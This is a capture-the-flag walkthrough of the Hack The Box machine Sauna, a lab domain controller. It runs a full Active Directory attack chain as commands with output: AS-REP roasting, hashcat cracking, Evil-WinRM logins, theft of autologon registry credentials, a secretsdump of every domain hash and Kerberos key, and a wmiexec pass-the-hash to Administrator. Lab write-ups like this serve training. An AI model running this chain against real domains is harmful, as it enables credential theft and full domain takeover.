This is a detailed walk-thru for sauna.htb written by dR1PPy
The challenges presented by Sauna walk the line between CTF and Real World very well.
It felt good to spend a day roasting in the Sauna while sharpening the Windows attack skills.
As always a big shout out to the machine creator egotisticalSW. It’s friends like you that help keep these challenges fun.
Enumeration
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.10.175 53 tcp domain open
10.10.10.175 53 udp domain open
10.10.10.175 88 tcp kerberos-sec open Microsoft Windows Kerberos server time: 2020-03-18 06:48:07Z
10.10.10.175 123 udp ntp open
10.10.10.175 135 tcp msrpc open Microsoft Windows RPC
10.10.10.175 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.10.175 389 tcp ldap open Microsoft Windows Active Directory LDAP Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.175 389 udp ldap open
10.10.10.175 445 tcp microsoft-ds open
10.10.10.175 464 tcp kpasswd5 open
10.10.10.175 593 tcp ncacn_http open Microsoft Windows RPC over HTTP 1.0
10.10.10.175 636 tcp tcpwrapped open
10.10.10.175 3268 tcp ldap open Microsoft Windows Active Directory LDAP Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.175 3269 tcp tcpwrapped open
10.10.10.175 9389 tcp mc-nmf open .NET Message Framing
10.10.10.175 49667 tcp msrpc open Microsoft Windows RPC
10.10.10.175 49673 tcp ncacn_http open Microsoft Windows RPC over HTTP 1.0
10.10.10.175 49674 tcp msrpc open Microsoft Windows RPC
10.10.10.175 49675 tcp msrpc open Microsoft Windows RPC
10.10.10.175 49686 tcp msrpc open Microsoft Windows RPC
10.10.10.175 49695 tcp msrpc open Microsoft Windows RPC
During our enumeration we find a possible user.
|_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
We try to run an impacket LDAP preauth script and are able to validate the username format.
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
No entries found!
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/hsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Cannot authenticate hsmith, getting its TGT
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/hugo -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Cannot authenticate hugo, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Using this same UID format we test the other possible users found on the webpage.
Doing this we find also find the valid username of ‘fsmith’ which provides us a password hash.
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0f109c4e7446bdd44ca5b0dc8fb903e9$520e39a3a6065b8a5a8bc691d94e2b377e397bef2a9f2d316f3fd6f7410bfa0813bcc681bf901546d0dc0b77718ebc8cbbb8988793c60da4a05899463e7cc4af9d85f5b87df00766ab0590060a4dbfde88c5bd8b78e660eb64a929a1c701b675dc19166ec45e7e6a3af8e95e9576d9c4b9e1e12c25fe9f885e67aa2630af52864827238a693a7c2b516174cd726b801192a93bfc4dccf9db0c70d77f8f6be434bc733a0d4cc9c320980290a339413fd5b48df3730fe2650866787361057a2d2a95fa08e5ab1bbf0d1c214379131d4ab97edcb51f12bd8377b70dad50196b9434e33772b41f1b8b1b7ccb9bad7198e37fca0d369258e869083e2463a749e10376
hashcat -m 18200 --force -a 0 fsmith-hash.txt /TOOL/rockyou.txt --show
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0f109c4e7446bdd44ca5b0dc8fb903e9$520e39a3a6065b8a5a8bc691d94e2b377e397bef2a9f2d316f3fd6f7410bfa0813bcc681bf901546d0dc0b77718ebc8cbbb8988793c60da4a05899463e7cc4af9d85f5b87df00766ab0590060a4dbfde88c5bd8b78e660eb64a929a1c701b675dc19166ec45e7e6a3af8e95e9576d9c4b9e1e12c25fe9f885e67aa2630af52864827238a693a7c2b516174cd726b801192a93bfc4dccf9db0c70d77f8f6be434bc733a0d4cc9c320980290a339413fd5b48df3730fe2650866787361057a2d2a95fa08e5ab1bbf0d1c214379131d4ab97edcb51f12bd8377b70dad50196b9434e33772b41f1b8b1b7ccb9bad7198e37fca0d369258e869083e2463a749e10376:Thestrokes23
ldapsearch -LLL -x -H ldap://sauna.htb -b '' -s base '(objectclass=*)'
Gaining Access
To validate our credentials we try to dump the AD info.
python GetADUsers.py -all EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip sauna.htbImpacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Querying sauna.htb for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2020-01-24 10:14:15.321116 2020-02-10 09:16:17.478519
Guest <never> <never>
krbtgt 2020-01-22 22:45:30.587720 <never>
HSmith 2020-01-22 22:54:34.140321 <never>
FSmith 2020-01-23 09:45:19.047096 2020-03-18 20:31:24.039258
svc_loanmgr 2020-01-24 16:48:31.678079 <never>
Ok looks like we have all we need to get our shell.
evil-winrm -i sauna.htb -u fsmith -p Thestrokes23 -s '/var/www/html/win' -e '/var/www/html/win/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
Escalating Privileges
We copy over WinPEAS.bat to help us with enumeration.
After reviewing the output we notice the following.
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
From our previous AD dump we noted the actual username as ‘svc_loanmgr’ so we connect back with our new user.
evil-winrm -i sauna.htb -u svc_loanmgr -p Moneymakestheworldgoround! -s '/var/www/html/win' -e '/var/www/html/win/'
Now we have another set of credentials to leverage. But How?
After spending some time trying standard enumeration we decided to just try stealing tokens directly.
Eventually we find we can use secretsdump.py from the Impacket toolkit to extract some User Hashes.
./secretsdump.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK/svc_loanmgr@10.10.10.175 -just-dc
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:d7f0c9f6fe1513213f825b3793e647ae:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:68e94a6f31b980eb073819802d9e1fda0178eb7431cc0a546c7dc57993cdbbfe
SAUNA$:aes128-cts-hmac-sha1-96:1b61a8449f192bdc9a1f019dcd2adaa0
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...
Now that we have the Admin hash we use the WMIExec shell to get our flag.
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd users\Administrator\Desktop
C:\users\Administrator\Desktop>type root.txt
And now we can leave the sauna nice and roasted.
Thanks for Playing Today!
Resources
Sauna.htb
https://www.hackthebox.eu/home/machines/profile/229